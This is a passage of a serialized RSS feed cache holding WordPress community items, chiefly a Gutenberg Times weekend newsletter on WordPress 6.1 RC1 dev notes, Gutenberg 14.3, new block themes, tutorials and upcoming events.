+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"Do The Woo Community: Highlights from a WooCommerce Keynote with Paul Maiorana\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=73129\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://dothewoo.io/highlights-from-woocommerce-keynote-with-paul-maiorana/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:443:\"<p>At WooSesh, Paul Maiorana talked about their new turnkey solution, Woo Experts, new core features, performance and developer resources.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/highlights-from-woocommerce-keynote-with-paul-maiorana/\">Highlights from a WooCommerce Keynote with Paul Maiorana</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 17 Oct 2022 09:08:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:151:\"Gutenberg Times: Extending Query Blocks, 160 Block Themes,  new tickets for WordCamp Asia,  WordPress 6.1 RC 1 and so much more – Weekend Edition 233\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=22413\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:153:\"https://gutenbergtimes.com/extending-query-blocks-160-block-themes-new-tickets-for-wordcamp-asia-wordpress-6-1-rc-1-and-so-much-more-weekend-edition-233/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:31861:\"<p>Howdy, </p>\n\n\n\n<p>You probably heard that <a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\">WordPress 6.1 Release candidate</a> was released. I am so excited about this ginormous release. Take a look at the <a href=\"https://make.wordpress.org/core/2022/10/12/wordpress-6-1-field-guide/\">WordPress 6.1 Fieldguide</a>! There are a ton of posts for developers to check out, be it about performance, accessibility, REST API, database or the block editor. Now it is definitely the time to start testing your sites, plugins, and themes for issues. If you find some report them on the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta/RC  forum</a>. </p>\n\n\n\n\n<p>If you are not a developer, use links in the table of contents to jump past the long list of Dev Notes.</p>\n\n\n\n\n<p>That was however not all, that happened this week. Gutenberg plugin was released, and I also was happy to find a series of great blog posts about the development experience, extending the block editor. </p>\n\n\n\n<p>Enjoy the news below of plugins, themes, and courses. </p>\n\n\n\n<p>Have a pleasant weekend!</p>\n\n\n\n<p>Yours, 💕<br /><em>Birgit</em></p>\n\n\n\n\n\n\n<div class=\"is-layout-flow wp-block-group has-light-background-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<p><strong>Table of Contents</strong></p>\n\n\n\n<div class=\"wp-block-sortabrilliant-guidepost\"><ul><li><a href=\"https://gutenbergtimes.com/feed/#0-word-press-release-information\">Developing Gutenberg and WordPress</a><ul><li><a href=\"https://gutenbergtimes.com/feed/#1-word-press-6-1\">WordPress 6.1 </a></li><li><a href=\"https://gutenbergtimes.com/feed/#1-more-editor-related-dev-notes-for-word-press-6-1\">Editor and block-theme related Dev Notes </a></li><li><a href=\"https://gutenbergtimes.com/feed/#2-gutenberg-14-3-released\">Gutenberg 14.3 released</a></li></ul></li><li><a href=\"https://gutenbergtimes.com/feed/#0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</a><ul><li><a href=\"https://gutenbergtimes.com/feed/#4-160-is-this-weeks-count-of-block-themes-in-the-word-press-repository\">160 Block Themes</a></li></ul></li><li><a href=\"https://gutenbergtimes.com/feed/#2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</a></li><li><a href=\"https://gutenbergtimes.com/feed/#3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor. </a></li><li><a href=\"https://gutenbergtimes.com/feed/#5-s\">Upcoming WordPress events</a><ul><li><a href=\"https://gutenbergtimes.com/feed/#8-learn-word-press-online-meetups\">Learn WordPress Online Meetups</a></li></ul></li></ul></div>\n</div></div>\n\n\n\n\n<h2 id=\"0-word-press-release-information\">Developing Gutenberg and WordPress</h2>\n\n\n\n<h3 id=\"1-word-press-6-1\">WordPress 6.1 </h3>\n\n\n\n<p>The Field Guide routinely bundles all the dev notes published around a major release of WordPress. It also lists smaller changes in a &#8220;But wait there is more&#8221; section. For WordPress 6.1 the documentation release team decided on two more guides: </p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/performance-field-guide-for-wordpress-6-1/\"><strong>Performance Field Guide</strong></a> and</li>\n\n\n\n<li> A separate list of <a href=\"https://make.wordpress.org/core/2022/10/11/wordpress-6-1-accessibility-improvements/\">Accessibility Improvements</a></li>\n</ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Leonardus Nugraha</strong>&nbsp;provided insight into  <a href=\"https://www.hostinger.com/blog/wordpress-6-1-beta\"><strong>WordPress 6.1 Beta: First Look Into the Next Major Release</strong></a> with code samples to create a pattern, add fluid typography to a theme&#8217;s theme.json file, and how to add block-template parts to a classic theme. It&#8217;s a great summary of many features coming to WordPress 6.1 </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In his post for Kinsta <a href=\"https://kinsta.com/blog/wordpress-6-1/\"><strong>What’s New in WordPress 6.1: Fluid Typography, Improved Template System, New Site Health Checks, and Much More!</strong></a>, Carlo Daniele, also describes the major features coming to WordPress 6.1, highlighting the Fluid Typography with example code, list the improvements to existing blocks, and explains how the new Border controls for Columns work. There is a lot more in that post to catch-up on what will be in the upcoming major WordPress release on November 1st, 2022. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>WordPress VIP</strong> published <a href=\"https://wpvip.com/2022/10/13/wordpress-6-1-hot-takes/\"><strong>WordPress 6.1: Hot Takes for Enterprise Content Creators</strong></a>. They highlighted the better design consistency, creating richer, more engaging experiences with an improved block editor.</p>\n\n\n\n<h3 id=\"1-more-editor-related-dev-notes-for-word-press-6-1\">Editor and block-theme related Dev Notes </h3>\n\n\n\n<p><em>Below I shared the links to this week&#8217;s Dev Notes related to Gutenberg. <a href=\"https://gutenbergtimes.com/style-variations-in-theme-directory-beta-first-devnotes-for-wordpress-6-1-ecommerce-blocks-by-edd-and-woo-weekend-edition-232/#1-word-press-6-1\">Last week&#8217;s edition listed four more.</a></em></p>\n\n\n\n<p>In <strong><a href=\"https://make.wordpress.org/core/2022/10/10/updated-editor-layout-support-in-6-1-after-refactor/\">Updated editor layout support in 6.1 after refactor</a> Isabel Brison</strong> wrote all about a new layout type in addition to Flow and Flex: Constrained. It helps designers and site builders to tame the Innerblocks of the layout blocks. In her dev note, Brison also listed additional layout updates.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In this post, <a href=\"https://make.wordpress.org/core/2022/10/10/changes-to-block-editor-preferences-in-wordpress-6-1/\"><strong>Changes to block editor preferences in WordPress 6.1</strong></a>, <strong>Daniel Richards</strong> describes the in and outs of the new Preference storage mechanism. Many content creators have waited for this for years: Now the block editor will actually remember your setting to switch on the Top Toolbar, and switch off the Full-screen view, and switch off the Welcome screen. Now it&#8217;s all stored in the database of your sites. It does not save it across multiple sites, though. WordPress is powerful but not that powerful. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>Developer are now empowered <a href=\"https://make.wordpress.org/core/2022/10/10/extending-the-query-loop-block/\"><strong>extending the Query Loop block</strong></a>. This post <strong>Nik Tsekouras</strong>, explains how you can add your custom query arguments via a block variation of the Query Loop block. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>The block editor now also has <a href=\"https://make.wordpress.org/core/2022/10/10/filters-for-theme-json-data/\"><strong>Filters for theme.json data</strong></a>, with it plugin and theme developer can query the styling and layout data for all three levels: Blocks, Themes and User. <strong>André Maneiro</strong> has the details for you. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>Components are the building blocks of core blocks and can also be used for custom blocks.  <strong>Marco Ciampini</strong> explained the <strong><a href=\"https://make.wordpress.org/core/2022/10/10/editor-components-updates-for-wordpress-6-1/\">Editor Components updates in WordPress 6.1</a>. </strong></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>Until now, styling via theme.json only worked for blocks and for Global styling. Now theme developers can start <a href=\"https://make.wordpress.org/core/2022/10/10/styling-elements-in-block-themes/\"><strong>styling elements in block themes</strong></a>,  that means all headers, regardless of where they are added can be consistently styled, same for buttons or input fields. This reduces considerably the lines in a theme&#8217;s custom style.css. This Dev note was authored by <strong>Ben Dwyer</strong>.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Ramon Dodd</strong> explained in his post the details of <a href=\"https://make.wordpress.org/core/2022/10/10/block-styles-generation-style-engine/\"><strong>Block styles generation (Style Engine)</strong></a>, how the styles found in themes, blocks, Styles UI and core blocks all come together in a black box before they reach the frontend of the site. Or something to that effect. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Adam Zielinski </strong>and <strong>Grzegorz Ziolkowski</strong> summarized the  <strong><a href=\"https://make.wordpress.org/core/2022/10/12/block-api-changes-in-wordpress-6-1/\">Block API changes in WordPress 6.1</a>.</strong> They explain several new&nbsp;Block&nbsp;API&nbsp;features available via the&nbsp;<code>block.json</code>&nbsp;file, specifically the new <code>render</code> attribute for dynamic block PHP templates, how multiple scripts can now registered for blocks, and developers can import single core blocks into their apps, rather than all core/blocks/ </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>One of the missing pieces for curating the editing experience were <strong><a href=\"https://make.wordpress.org/core/2022/10/11/content-locking-features-and-updates/\">Content locking features and updates</a>.</strong> In his dev note, <strong>Jorge Costa</strong> explains how content-only editing for blocks, patterns, and templates, will work and how a template lock inheritance for the Column&nbsp;block functions. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><a href=\"https://make.wordpress.org/core/2022/10/11/simplified-data-access-with-new-react-hooks-in-wordpress-6-1/\"><strong>Simplified data access with new React hooks in WordPress 6.1</strong></a>&nbsp;ensure a better WordPress developer experience, we learn from <strong>Adam Zielinski&#8217;</strong>s dev note.  The amount of code necessary to access WordPress data like post, pages, users, or custom post types have been considerably reduced. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In his post <a href=\"https://make.wordpress.org/core/2022/10/11/reference-styles-values-in-theme-json/\"><strong>Reference Styles values in theme.json</strong></a>, <strong>Ben Dwyer</strong> outlines how you can ensure consistency and avoid duplication of code across entities. If you have a color palette defined, blocks and template parts can reference the particular variable across all other styles so they adhere to the color palette of the theme. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Brian Alexander</strong> wrote about the <a href=\"https://make.wordpress.org/core/2022/10/07/improved-php-performance-for-core-blocks-registration/\"><strong>Improved PHP performance for core blocks registration</strong></a> which is achieved through making sure that only the files required for the blocks on the canvas are loaded in memory. Until now, all 70+ core blocks were loaded all the time. That&#8217;s a huge performance gain for WordPress sites. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><a href=\"https://make.wordpress.org/core/2022/10/11/enhanced-typescript-support-in-wordpress-6-1/\"><strong>Enhanced TypeScript support in WordPress 6.1</strong></a> improves the developer experience for WordPress developers, as most programming tools tap into the Typescript signatures and notify the developer, when there is the wrong type or required arguments are missing. In the video embedded into the post,  <strong>Adam Zielinski</strong> shows the interaction of an&nbsp;IDE&nbsp;for auto-completion and static checks.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Ramon Dodd</strong> also write about the implementation of <a href=\"https://make.wordpress.org/core/2022/10/03/fluid-font-sizes-in-wordpress-6-1/\"><strong>Fluid font sizes in WordPress 6.1</strong></a>. You learn how they work and how you can control them via the theme.json file. This is another feature improving the overall responsiveness of the block editor. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In the post, <a href=\"https://make.wordpress.org/core/2022/10/10/miscellaneous-editor-changes-for-wordpress-6-1/\"><strong>Miscellaneous editor changes for WordPress 6.1</strong></a>, you learn about the small changes and sometime also make a big difference, for instance, content patterns for custom post types, improvements to the Cover block, or a new filter for he Navigation block. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>Creating a consistent UI for blocks, was one of the focuses for this WordPress release. The team is about 50% there. In this <a href=\"https://make.wordpress.org/core/2022/10/11/roster-of-design-tools-per-block/\"><strong>Roster of design tools per block</strong></a>, you can look up which blocks have which set of design tools in the categories: Typography, Color, Dimension, Border, and Layout controls. </p>\n\n\n\n<img />\n\n\n\n<h3 id=\"2-gutenberg-14-3-released\">Gutenberg 14.3 released</h3>\n\n\n\n<p><strong>Aaron Robertshaw</strong>  was the release lead for version 14.3 of the Gutenberg plugin. In his release post <a href=\"https://make.wordpress.org/core/2022/10/13/whats-new-in-gutenberg-14-3-12-october/\"><strong>What’s new in Gutenberg 14.3? (12 October)</strong></a> he highlighted: </p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/10/13/whats-new-in-gutenberg-14-3-12-october/#quickly-navigate-blocks-of-text\">Quickly navigate blocks of text</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/13/whats-new-in-gutenberg-14-3-12-october/#improved-drag-and-drop-for-images\">Improved drag and drop for images</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/13/whats-new-in-gutenberg-14-3-12-october/#typography-panels\">Improved tools panels for the Styles typography controls</a></li>\n</ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Sarah Gooding</strong> at WPTavern, took it for a spin and found <a href=\"https://wptavern.com/gutenberg-14-3-improves-image-drag-and-drop\"><strong>Gutenberg 14.3 Improves Image Drag and Drop</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Dave Smith</strong> joined me for the <strong><a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-74-gutenberg-14-2-14-3-wordpress-6-1-style-variations-in-theme-directory-course-on-gutenberg-data-layer/\">Gutenberg Changelog episode 74</a></strong> recording on Friday. We discussed WordPress 6.1, Gutenberg releases 14.2 and 14.3  community projects and what comes next. <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-74-gutenberg-14-2-14-3-wordpress-6-1-style-variations-in-theme-directory-course-on-gutenberg-data-layer/\">The episode is now available online</a>. </p>\n\n\n\n<img /><strong>Dave Smith</strong> and Birgit Pauli-Haack recording <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-74-gutenberg-14-2-14-3-wordpress-6-1-style-variations-in-theme-directory-course-on-gutenberg-data-layer/\">episode 74 of the Gutenberg Changelog</a>\n\n\n\n<div class=\"is-layout-flow wp-block-group has-light-background-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<p><strong>🎙️ </strong> New episode:  <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-74-gutenberg-14-2-14-3-wordpress-6-1-style-variations-in-theme-directory-course-on-gutenberg-data-layer/\">Gutenberg Changelog #74 – Gutenberg 14.2, 14.3, WordPress 6.1, Style Variations in Theme Directory, Course on Gutenberg Data Layer</a> with special guest, Dave Smith, and host Birgit Pauli-Haack</p>\n</div></div>\n\n\n\n<h2 id=\"0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</h2>\n\n\n\n<p><strong>Jamie Marsland</strong> make you a master in building layouts with his newest video <a href=\"https://www.youtube.com/watch?v=Ed7s5MFg_vs\"><strong>Create Pro WordPress Page Layouts in Just 10 Minutes</strong></a>. He explains the CSS box model hierarchy, starting with the content, and the adding padding, border and margin with the new controls in the block editor. He then goes on and explains the spacing between columns, he called Gutter. Being able to change the gutter has considerable implications for creating great layouts, Marsland found. Go on, check it out and learn all about columns-based layouts in <a href=\"https://www.youtube.com/watch?v=Ed7s5MFg_vs\">this video. </a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>At this week&#8217;s <a href=\"https://www.youtube.com/watch?v=3eV6z2sNJOI\"><strong>Torque Social Hour: An AI-Generative Art Block for WordPress</strong></a>, DocPop talked to Aaron Edwards, the co-founder of Infinite Uploads and CTO of WPMU DEV.  They discussed my new favorite plugin <a href=\"https://wordpress.org/plugins/imajinn-ai/\">Imajinn, a new WordPress block</a> that brings the power of AI-generative art to your WordPress dashboard.</p>\n\n\n\n<p><strong>Jeff Chandler</strong> posted not long ago a review of Aaron Edward&#8217;s plugin: <a href=\"https://torquemag.io/2022/10/imajinn-brings-royalty-free-ai-photo-generation-to-the-post-editor/\"><strong>Imajinn Brings Royalty Free AI Photo Generation to the Post Editor</strong></a>.He describes his experience with it of creating a prompt, receiving images back, going through the free credits fast and also what he finds missing. Chandler wrote &#8220;Being able to create royalty-free images from the backend of WordPress using Artificial Intelligence is one of the coolest features I’ve seen added to WordPress in a long time.&#8221; I entirely agree with him there. 🙌</p>\n\n\n\n<p><em>The featured image on this blog post and two other blog post on this site were also created through the Imajinn AI block. When you scroll through <a href=\"https://gutenbergtimes.com\">the home page</a> you will notice them right away, I think. </em></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<h3 id=\"4-160-is-this-weeks-count-of-block-themes-in-the-word-press-repository\">160 Block Themes</h3>\n\n\n\n<p>160 is this week&#8217;s count of <a href=\"https://wordpress.org/themes/tags/full-site-editing/\">Block Themes in the WordPress repository.</a> </p>\n\n\n\n<img />\n\n\n\n<p><a href=\"https://wordpress.org/themes/powder/\"><strong>Powder</strong></a> is the latest theme by <strong>Brian Gardner</strong> in the WordPress repository. According to Gardner&#8217;s <a href=\"https://twitter.com/bgardner/status/1580620907168419842\">tweet</a>, it is simple by design, a stripped down version of WP Engine&#8217;s Frost Theme. It&#8217;s still experimental and requires the Gutenberg plugin.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong><a href=\"https://gutenbergtimes.com/feed/[https://twitter.com/mrpaultruong\">Paul Truong</a> </strong> published his first theme ever, called <a href=\"https://wordpress.org/themes/molten/\"><strong>Molten</strong></a>, a theme for passionate chefs and restaurateurs. You can find 20 well-designed patterns listed and when you add the string <code>?beta=style_variations</code> to the theme&#8217;s URL you can also browse through an additional three Style Variations. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>Another first block theme contribution in the repository is <a href=\"https://wordpress.org/themes/raft/\">Raft by Themeisle</a>, with seven Style Variations, and nine patterns. <strong>Sarah Gooding</strong> has a review for you. <a href=\"https://wptavern.com/raft-a-new-multipurpose-block-theme-for-wordpress\"><strong>Raft: A New Multipurpose Block Theme for WordPress</strong></a></p>\n\n\n\n<h2 id=\"2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</h2>\n\n\n\n<p><strong>Will Morris</strong> published his tutorial on <a href=\"https://torquemag.io/2022/10/create-wordpress-block-theme/\"><strong>How to Create a WordPress Block Theme (In 3 Steps)</strong></a> on the Torque Magazine site. The steps he explains are: Install a WordPress block theme, customize your theme with the Site Editor, export your modifications as a new block theme. Morris works through all that using the <a href=\"https://wordpress.org/plugins/create-block-theme/\">Create Block Theme plugin</a> by the WordPress team in the plugins repository. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Brian Gardner</strong> shared in his post <a href=\"https://wpengine.com/builders/box-shadow-style-blocks/\"><strong>Create a Box-shadow Style for Various Blocks</strong></a> the necessary code snippets to add box shadow to Images, Buttons, and Quote Blocks. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Julio Marchi</strong> explored <a href=\"https://thedigitalinsider.com/why-classic-wordpress-themes-arent-going-away/\"><strong>Why Classic WordPress Themes Aren’t Going Away</strong></a> on the blog The Digital Insider. One of the reasons is that classic themes provide a higher flexibility to build advanced bespoke themes. Marchi also points out that new features comeing to WordPress include ways for classic themes to make use of the theme.json file as well as the feature to allow block-theme template parts to be added to classic themes and offer patterns for those templates parts. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>New on WordPress TV: <a href=\"https://wordpress.tv/2022/10/14/lets-code-creating-custom-templates-and-template-parts/\"><strong>Let’s code: creating custom templates and template parts</strong></a> with <strong>Jonathan Bossenger</strong>. WordPress 6.1 will include ways to create custom templates and template parts for your block theme from the Site Editor. Bossenger shows in this video how you can register and create custom templates and template parts from the editor, as well as how to register them in your theme.json file when distributing your new block theme.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>On CSS Tricks, <strong>Ganesh Dahal</strong> published a tutorial on how to <a href=\"https://css-tricks.com/fluid-typography-wordpress-block-themes/\"><strong>add Fluid Typography Support to WordPress Block Themes</strong></a>. Dahal has a list of all the blocks supporting Fluid typography, provides instructions on how  to configure font-sizes to play well with the feature and explains what happens under the hood. </p>\n\n\n\n\n<p><strong>&nbsp;<a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/\" target=\"_blank\" rel=\"noreferrer noopener\">&#8220;Keeping up with Gutenberg &#8211; Index 2022&#8221;</a>&nbsp;</strong><br />A chronological list of the WordPress Make Blog posts from various teams involved in Gutenberg development: Design, Theme Review Team, Core Editor, Core JS, Core CSS, Test and Meta team from Jan. 2021 on. Updated by yours truly.  <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2020/\"><em>The index 2020 is here</em></a></p>\n\n\n\n\n<h2 id=\"3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor. </h2>\n\n\n\n<p><strong>Fabian Kägy</strong> announced this week that <a href=\"https://10up.com/blog/2022/10up-publicly-releases-its-gutenberg-best-practices/\"><strong>10up publicly releases its Gutenberg Best Practices</strong></a> documentation. Kägy is an Associate Director of Editorial Engineering at 10up, an agency with plenty of contributions to the WordPress open-source project. They built highly visible websites, like The White House, Five Thirty Eight, or the World Economic Forum. </p>\n\n\n\n<p>Kägy wrote in his post:  &#8220;Our Gutenberg Best Practices are meant to work in tandem with the WordPress Core documentation and expand upon its foundation to provide a more client-services-centric approach tailored to engineering enterprise-level editorial experiences.&#8221; The microsite is divided up on Training, Reference, and Guides.  Check it out. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Nathan Wrigley</strong> had <strong>Nick Diego</strong> as guest on the 46th episode of the WPTavern Jukebox podcast and discussed <a href=\"https://wptavern.com/podcast/46-nick-diego-on-why-you-should-be-excited-about-the-possibilities-of-wordpress-blocks\"><strong>Why You Should Be Excited About the Possibilities of WordPress Blocks</strong></a>. Wrigley wrote: &#8220;It’s becoming easier to create the blocks, as the tools take away much of the technical burden of getting you up and running without advanced knowledge of JavaScript and React. Coupled with core components, native block supports, and a bit of guidance, Nick thinks that every WordPress developer can add custom blocks to their repertoire.&#8221;</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Brian Coords</strong> discovered the <a href=\"https://www.briancoords.com/wordpress-secret-world-of-javascript/\"><strong>WordPress’ Secret World of JavaScript</strong></a>, when taking the new Course on <em>Learn.WordPress</em> <a href=\"https://learn.wordpress.org/course/using-the-wordpress-data-layer/\">Using the WordPress Data Layer</a>. Coords also marveled on the fact that all the great tools available to allow developers to build on basis of WordPress outside the block editor for instance on settings pages of a plugin or on supplement admin pages and not many are using them (yet). </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Cameron Jones</strong> also shared his experience developing around the block editor and found: <a href=\"https://cameronjonesweb.com.au/blog/adding-a-custom-icon-to-the-social-links-block-should-not-be-this-hard/\"><strong>Adding A Custom Icon To The Social Links Block Should Not Be This Hard</strong></a>. His task was to add another service and icon to the core&#8217;s Social Block. Jones takes us along his journey of figuring out how to accomplish this task. There were a few U-turns and cul-de-sac moments on the way. I found it quite an interesting read, as it elaborated on the gaps that need to be closed for the Gutenberg project to be more attractive to extenders in the future. </p>\n\n\n\n<p>If you want to believe Jones, it was not missing documentation. &#8220;And to my pleasant surprise, the <a href=\"https://developer.wordpress.org/block-editor/reference-guides/block-api/block-variations/\" target=\"_blank\" rel=\"noreferrer noopener\">official documentation</a> was quite good in this regard.&#8221; he wrote. And after going through all the up and downs of learning new things, Jones concluded: <em>&#8220;The provision of the <code>@wordpress/scripts</code> package and much improved documentation makes me feel far more confident in starting to approach development for the block editor again.&#8221;</em> </p>\n\n\n\n<p>Nevertheless, I have to agree with Jones: it shouldn&#8217;t be so hard to add another block variations to a block that mostly sports block variations out of the box. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In his tutorial <a href=\"https://css-tricks.com/rendering-external-api-data-in-wordpress-blocks-on-the-front-end/\"><strong>Rendering External API Data in WordPress Blocks on the Front End</strong></a>, <strong>Manoj Kumar</strong> shows you how to build a dynamic block that fetches data from an external API and renders it on the frontend when a particular block is dropped into the Block Editor of a post. He uses the create-block scaffolding tool to get started, fetches data with <code>useEffect()</code> and store the data in the database and retrieves for the block rendering on the front end. </p>\n\n\n\n\n<p><strong><a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s master branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. <br />Have you been using it? Hit reply and let me know.</p>\n\n\n\n<p><img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/bph/gutenberg/total?style=for-the-badge\" /></p>\n\n\n\n\n<h2 id=\"5-s\">Upcoming WordPress events</h2>\n\n\n\n<p>November 18, 2022 <br /><strong><a href=\"https://www.wordfest.live/2022/november/\">WordFest Live Returns</a></strong> &#8211; the 24-hour Festival of WordPress</p>\n\n\n\n<p>February 17 &#8211; 19, 2023<br 